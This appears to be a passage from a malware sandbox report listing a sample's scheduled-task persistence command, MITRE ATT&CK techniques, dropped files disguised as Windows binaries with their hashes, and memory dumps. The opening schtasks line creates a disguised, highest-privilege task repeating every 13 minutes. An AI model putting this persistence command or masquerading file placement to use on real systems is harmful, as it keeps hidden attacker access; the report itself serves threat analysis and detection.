schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 13 /tr "'C:\Windows\System32\MailContactsCalendarSync\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:1140

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Windows Photo Viewer\es-ES\dllhost.exe

Filesize
1.7MB

MD5
8294fdea7cd1b7bdb48c0b4741188315

SHA1
de66f525c6866c46e0d90ca4fb7606c68dceffc4

SHA256
32c0bc904276eacebc66e1ded0e97ea17f923a874b3f97e107f975b38108a67d

SHA512
01a20a8e15a208ec5392621d7b4bc2ffcfb4eb3986d0c1b5b5273112101ef14929efbabab9a82ddaa21e525eb28fb0dec65102ca9d4425335878757292e52f53

Download Submit
C:\ProgramData\SoftwareDistribution\wininit.exe

Filesize
1.7MB

MD5
f5f9044d0fa5ef8b61fb82aea6365c8e

SHA1
6c14b9a65610977eb46bc6056dd0befab613a18a

SHA256
4da44b9477334a362c57dde6593dbba9ce97ca7b93e21fcfbf7664f22a1fbec6

SHA512
5b3866754be8d0d0302506c88128c606b9591d0b13b915815b456430e52ea8951e3dd5d2231130b240bb2fe4278f7f93cc9bc9a64f961f3fae91a8a011a171d2

Download Submit
C:\Recovery\WindowsRE\sppsvc.exe

Filesize
1.7MB

MD5
7a6337d1705c5b4e696b224c29fc5233

SHA1
5631625b8754ac8e02f9b441a47b229ac37a6cbc

SHA256
916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9

SHA512
7727e5546724c46ac6c481989860e93f7b0e4537a0fc8a1d8595657181c985213f794390f0198a4a69f7b19f999b4bfef5d044f2a6fd2ecc51be119207753efe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe.log

Filesize
1KB

MD5
7800fca2323a4130444c572374a030f4

SHA1
40c9b8e0e5e7d72a5293f4010f2ccf21e637b4aa

SHA256
29f5645ac14353ac460858f52c856548f3aeb144b09eef672a6b4849bafe742e

SHA512
c8a7ad930b8c07007c7a67d8c32a2a4a401dcc34ab966e0e80901655fcbe1f5c95b72a195e6381b1de56c2c987eeab093d8e89891bec9e9684785c5d824b3554

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\explorer.exe.log

Filesize
1KB

MD5
3ad9a5252966a3ab5b1b3222424717be

SHA1
5397522c86c74ddbfb2585b9613c794f4b4c3410

SHA256
27525f5fc7871c6828ab5173315e95b5c7e918d2ee532781c562c378584b5249

SHA512
b1a745f7a0f33b777ffc34f74f42752144d9f2d06b8bc613e703570494762b3af87e153212c3274b18af14f17b8619e2f350b7c3cc11228f7d4208d4251e90e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6c47b3f4e68eebd47e9332eebfd2dd4e

SHA1
67f0b143336d7db7b281ed3de5e877fa87261834

SHA256
8c48b1f2338e5b24094821f41121d2221f1cb3200338f46df49f64d1c4bc3e0c

SHA512
0acf302a9fc971ef9df65ed42c47ea17828e54dff685f4434f360556fd27cdc26a75069f00dcdc14ba174893c6fd7a2cfd8c6c07be3ce35dafee0a006914eaca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a1008cfb29cdc25b4180c736ec404335

SHA1
39760fbcc8c1a64e856e98d61ce194d39b727438

SHA256
0eb4209b0f8c0dce02580b4d3ec5692d33be08b1a61858aad0413116afc95558

SHA512
00c2cde1601217c28fd71c2daefb21c7fcfeeee7e6badcd1b7f353f4e6df7817f5c4665148a1468b10ea31547642b999e3db5914d6e5f0cb1123243fd9ef213f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
92075279f2dbcaa5724ee5a47e49712f

SHA1
8dd3e2faa8432dde978946ebaf9054f7c6e0b2cb

SHA256
fd985ddd090621af25aa77aebff689c95ea7679ff0e81887124b2802ae3e9442

SHA512
744c62556233d9872f43ffb5a5a98aee20a44834436306f0a948c8c4072bdb46ef8044616593747edd645caaee60faf8b14fedb2d6df5f6019b5c73357d80d22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3c625954a51c4bbd8141206b00f6fc0a

SHA1
4128cb2f9d2984844e303e2e330e448334e5c273

SHA256
952515feb4929cfad2435c679a5fad19242e938e8a7c97afebb1f3d996bd3ec4

SHA512
3f7c4ea0551de5b6237ca13419413e6e73e85632e9bb09b5354d6310b5969f9c3a2dc27142e75e8572c2c65b2bc7615269fad27dcea2f91c389b6758e2630517

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
0f6a77860cd9c5289dd6e45bbc36a982

SHA1
750d55b0d394bc5716fc3e3204975b029d3dc43b

SHA256
a8388051b43fdc7a50ee51047ef4076c4b6502a6e53befe8131efcb71aa700a4

SHA512
e4e4473383243a71d7bebffb8bf4bf449201e1aee752426044e81bdc12c3aaf284ce003a859b0ac96d5fd75063376485dc5b5ac0caad189577bf394f104cdd06

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
8320aeea03d40a74715d8b9613f9d0cc

SHA1
09fcf3cf06de496b434aaf3181f5aed78731425e

SHA256
54d89ac6af0379f2fa8afc5137450f796cd22f70da2b6b68a299b23c521eb205

SHA512
7d6fd85c54a4c8a63069fa02cd8b892f448be8b11b97190653864a076bfe5f2d4061b354ce2e3ad8b49a0e482ee90992493bb823f5e6f664dc7ac3937a547dba

Download Submit
C:\Users\Admin\AppData\Local\Temp\35UmqwIyoT.bat

Filesize
267B

MD5
6ed8bb5b6d8690041a5b57e60643b0d5

SHA1
62ab53fbfc1e3745c343315d906d7bd9777017f6

SHA256
eb7228c18d3344dcc7cc02ca18b91e28ab869682b36c01b37b0c5883e4b61eff

SHA512
546976e74db79bc1f3e4eb38d82bde4333ec8977e0d2378c29286d970a13c02fce12a561780c023be6e0da3fd7509e5838cb21a32e8a2e3486c529ea91e1e03d

Download Submit
C:\Users\Admin\AppData\Local\Temp\55393b1a-faf6-4591-bc89-0dce76ccd430.vbs

Filesize
705B

MD5
3b4042b2e8f41edf2d7240665c9e964f

SHA1
a293e1f995ad8ea00e8aeef6ec7db43fd5e06ea5

SHA256
2a7430dd7f0611e9c64357cfb170b6d0db7f309a6c8b4bd43de69f0e07eaccf0

SHA512
f57a26e8f009e896a6f0604978b5e784be0e9a9300b86e104e3b140c1e518a7098552e2f6f48937a300dde596e15e56f03b4df8da5f7ff36ceee6515abb864d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vf2nk1av.fre.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\c0d87a24-b66c-4ee3-86bc-ff3affe4a7a5.vbs

Filesize
481B

MD5
051d08ea38c93db02069af130af45d6f

SHA1
a74a3ca679dc51d0d61bc5ad5aee517c3fecd9d6

SHA256
fcf1bcd6d937a8d3511673652353697ef35cc1369982b93fafa0cfeaebc2e1cd

SHA512
72b6aabf81d4ec35f868cf169df5ad4986725ab5e9bb2b313fd671dbc9513c5b8178cfc86a422ab09935bc1df5d981cc7ad4bc6e7dd0fd219b5f486616246d9c

Download Submit
C:\Users\Default\MusNotification.exe

Filesize
1.7MB

MD5
95ca29f40e0121eef44d4cfe19e83929

SHA1
76690d35743063329f643b90185e584b710284c8

SHA256
73243f1d8c2e24a0b071e0f58f0548179167eb69ed556fb6fe0611e32c02bb47

SHA512
65fbb91d6427d91b6b91184ba27ecea9bea5036d805d8ee903b21622f5efb4821e9a2df2191a1c02b3c838b8d34e2a4b6fe906c1e3478b34671e2c48d0ae5e6c

Download Submit
C:\Users\Public\AccountPictures\winlogon.exe

Filesize
1.7MB

MD5
bd480255da51502c09bc14da5442aad5

SHA1
1af5a64b5e5dacb2953eaa7cf815d169ab76cf7e

SHA256
6fe37a1cfd075672199e0aa9ce41c7232a3d7940e7f27e584afd3f61dda909be

SHA512
993e5f6cb62dc36a02a4a06dd058f1bb98aa52cce18b050f808ba211205df8adfe827ee2ad8625ede08c9d90b1d65d396a7476f79bd81059b068bca2a67d5e22

Download Submit
C:\Users\Public\Videos\wininit.exe

Filesize
1.7MB

MD5
788067a85b7847473f99e6259248deec

SHA1
1802cb9075ed7d81ece89c73cbbf13abfba67b41

SHA256
65eab0041f8afbe12e4bb5646811e121eeb18f5759e62f88a158f3eac631e717

SHA512
4c9d4091edba69f66d7b9eb53874efb7bbea8c2b92063a96a5df1c46455704c9b5c56fbfadd4560ab930cf6e3b2651f294c7c40e0c724e22cac2384898d587ca

Download Submit
memory/548-155-0x000002417EA00000-0x000002417EA22000-memory.dmp

Filesize
136KB

Download
memory/1472-500-0x0000000002880000-0x0000000002892000-memory.dmp

Filesize
72KB

Download
memory/3656-268-0x0000000002C70000-0x0000000002C82000-memory.dmp

Filesize
72KB

Download
memory/3832-5-0x000000001B160000-0x000000001B168000-memory.dmp

Filesize
32KB

Download
memory/3832-16-0x000000001B320000-0x000000001B328000-memory.dmp

Filesize
32KB

Download
memory/3832-10-0x000000001B2D0000-0x000000001B2DC000-memory.dmp

Filesize
48KB

Download
memory/3832-7-0x000000001B2A0000-0x000000001B2B6000-memory.dmp

Filesize
88KB

Download
memory/3832-157-0x00007FFE57050000-0x00007FFE57B11000-memory.dmp

Filesize
10.8MB

Download
memory/3832-15-0x000000001B310000-0x000000001B31A000-memory.dmp

Filesize
40KB

Download
memory/3832-6-0x000000001B170000-0x000000001B180000-memory.dmp

Filesize
64KB

Download
memory/3832-22-0x00007FFE57050000-0x00007FFE57B11000-memory.dmp

Filesize
10.8MB

Download
memory/3832-4-0x000000001B940000-0x000000001B990000-memory.dmp

Filesize
320KB

Download
memory/3832-3-0x000000001B140000-0x000000001B15C000-memory.dmp

Filesize
112KB

Download
memory/3832-0-0x00007FFE57053000-0x00007FFE57055000-memory.dmp

Filesize
8KB

Download
memory/3832-134-0x00007FFE57053000-0x00007FFE57055000-memory.dmp

Filesize
8KB

Download
memory/3832-2-0x00007FFE57050000-0x00007FFE57B11000-memory.dmp

Filesize
10.8MB

Download
memory/3832-8-0x000000001B180000-0x000000001B192000-memory.dmp

Filesize
72KB

Download
memory/3832-21-0x00007FFE57050000-0x00007FFE57B11000-memory.dmp

Filesize
10.8MB

Download
memory/3832-17-0x000000001BC90000-0x000000001BC9C000-memory.dmp

Filesize
48KB

Download
memory/3832-18-0x000000001BCA0000-0x000000001BCAC000-memory.dmp

Filesize
48KB

Download
memory/3832-9-0x000000001B2C0000-0x000000001B2D0000-memory.dmp

Filesize
64KB

Download
memory/3832-14-0x000000001B300000-0x000000001B30C000-memory.dmp

Filesize
48KB

Download
memory/3832-13-0x000000001B2F0000-0x000000001B2FC000-memory.dmp

Filesize
48KB

Download
memory/3832-11-0x000000001B2E0000-0x000000001B2E8000-memory.dmp

Filesize
32KB

Download
memory/3832-23-0x00007FFE57050000-0x00007FFE57B11000-memory.dmp

Filesize
10.8MB

Download
memory/3832-1-0x00000000004A0000-0x0000000000656000-memory.dmp

Filesize
1.7MB

Download